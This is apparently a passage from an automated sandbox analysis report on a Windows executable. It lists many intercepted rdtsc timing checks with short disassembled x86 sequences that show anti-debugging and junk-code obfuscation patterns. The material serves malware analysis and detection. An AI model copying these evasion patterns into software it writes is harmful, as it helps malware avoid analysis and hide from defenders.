              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 781ABA second address: 781B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F63C8B57C26h 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F63C8B57C18h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push edi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b ja 00007F63C8B57C16h 0x00000031 jbe 00007F63C8B57C16h 0x00000037 popad 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78203F second address: 782043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 782AC5 second address: 782AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78292A second address: 78292F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7839CB second address: 783A0F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e mov dword ptr [ebp+12455516h], ecx 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F63C8B57C18h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 cld 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 push eax 0x00000039 pop eax 0x0000003a pop ecx 0x0000003b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7874DE second address: 7874E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A04A second address: 78A04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AE5E second address: 78AE6B instructions: 0x00000000 rdtsc 0x00000002 je 00007F63C8D82F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCE3 second address: 78DCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCE8 second address: 78DCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DCEF second address: 78DD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F63C8B57C16h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EDCF second address: 78EDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EDD4 second address: 78EDEF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8B57C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F63C8B57C22h 0x00000011 jp 00007F63C8B57C1Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AFE2 second address: 78AFF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EDEF second address: 78EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 cmc 0x00000006 push 00000000h 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F63C8B57C18h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D34F4h], eax 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 je 00007F63C8B57C16h 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AFF2 second address: 78B099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2983h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F63C8D82F48h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor dword ptr [ebp+122D2F17h], eax 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F63C8D82F48h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 add ebx, 6C625027h 0x0000005f mov eax, dword ptr [ebp+122D0385h] 0x00000065 pushad 0x00000066 sub dword ptr [ebp+122D35F3h], esi 0x0000006c xor esi, dword ptr [ebp+122D2E7Ch] 0x00000072 popad 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F63C8D82F54h 0x0000007a nop 0x0000007b jo 00007F63C8D82F4Eh 0x00000081 push ebx 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EF35 second address: 78EF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F63C8B57C20h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791D14 second address: 791D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F01 second address: 790FA0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F63C8B57C18h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F63C8B57C18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 adc di, 4143h 0x0000004c mov edi, dword ptr [ebp+122D226Dh] 0x00000052 and edi, dword ptr [ebp+122D298Bh] 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f jmp 00007F63C8B57C22h 0x00000064 mov eax, dword ptr [ebp+122D0175h] 0x0000006a mov dword ptr [ebp+122D374Eh], ecx 0x00000070 push FFFFFFFFh 0x00000072 mov ebx, 132C223Ah 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c js 00007F63C8B57C16h 0x00000082 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791D18 second address: 791D1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790FA0 second address: 790FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790FA4 second address: 790FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790FAA second address: 790FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CB5 second address: 795CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 791E32 second address: 791E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795CB9 second address: 795CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F63C8D82F48h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793D50 second address: 793D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 794EC0 second address: 794EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793D54 second address: 793D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793D58 second address: 793D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796EA0 second address: 796EB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F63C8B57C16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jl 00007F63C8B57C1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797C6D second address: 797CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F63C8D82F48h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 call 00007F63C8D82F4Dh 0x00000028 mov di, 8517h 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f jmp 00007F63C8D82F59h 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D2E4Bh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jbe 00007F63C8D82F46h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CDB second address: 797CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CF7 second address: 797D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F63C8D82F51h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797D0C second address: 797D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749DF7 second address: 749DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797F4D second address: 797F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749DFB second address: 749E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F63C8D82F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749E06 second address: 749E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F63C8B57C1Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A405 second address: 79A40B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A40B second address: 79A415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F63C8B57C16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B33 second address: 7A3B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB621 second address: 7AB625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB625 second address: 7AB629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB629 second address: 7AB633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB633 second address: 7AB637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF90A second address: 7AF913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF913 second address: 7AF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0505 second address: 7B055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C23h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c js 00007F63C8B57C47h 0x00000012 jmp 00007F63C8B57C29h 0x00000017 jmp 00007F63C8B57C28h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B055A second address: 7B055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B055E second address: 7B0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B06FE second address: 7B0702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0702 second address: 7B0706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0706 second address: 7B0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F63C8D82F4Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0726 second address: 7B072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0882 second address: 7B089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F55h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D1B second address: 7B4D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F63C8B57C1Eh 0x0000000c jo 00007F63C8B57C16h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F63C8B57C1Eh 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4FF0 second address: 7B5003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F63C8D82F4Ch 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5003 second address: 7B5008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B52C1 second address: 7B52C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B559A second address: 7B55B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F63C8B57C16h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B56F5 second address: 7B5726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F63C8D82F56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F63C8D82F52h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5726 second address: 7B573B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F63C8B57C1Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B573B second address: 7B575C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8D82F56h 0x00000008 jnc 00007F63C8D82F46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B58BE second address: 7B58C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B58C2 second address: 7B58E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F63C8D82F57h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7690B9 second address: 7690C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C7E second address: 7B5C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C8D second address: 7B5C92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C92 second address: 7B5C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F1AE second address: 77F1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8B57C1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F1C2 second address: 77F22F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F63C8D82F48h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 cld 0x00000025 lea eax, dword ptr [ebp+12472EDEh] 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F63C8D82F48h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F63C8D82F56h 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F22F second address: 76860C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F63C8B57C28h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov ecx, esi 0x00000015 call dword ptr [ebp+122D1BB3h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F63C8B57C23h 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F732 second address: 77F739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F7A8 second address: 77F7AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F7AE second address: 77F852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F63C8D82F50h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jns 00007F63C8D82F55h 0x00000018 mov eax, dword ptr [eax] 0x0000001a jne 00007F63C8D82F65h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 jmp 00007F63C8D82F4Ah 0x00000029 pop eax 0x0000002a jbe 00007F63C8D82F58h 0x00000030 call 00007F63C8D82F49h 0x00000035 jo 00007F63C8D82F50h 0x0000003b pushad 0x0000003c pushad 0x0000003d popad 0x0000003e jne 00007F63C8D82F46h 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 jnc 00007F63C8D82F46h 0x0000004f pop edx 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F852 second address: 77F869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F63C8B57C16h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F869 second address: 77F86D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F86D second address: 77F888 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d je 00007F63C8B57C38h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F63C8B57C16h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F960 second address: 77F96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F96B second address: 77F96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
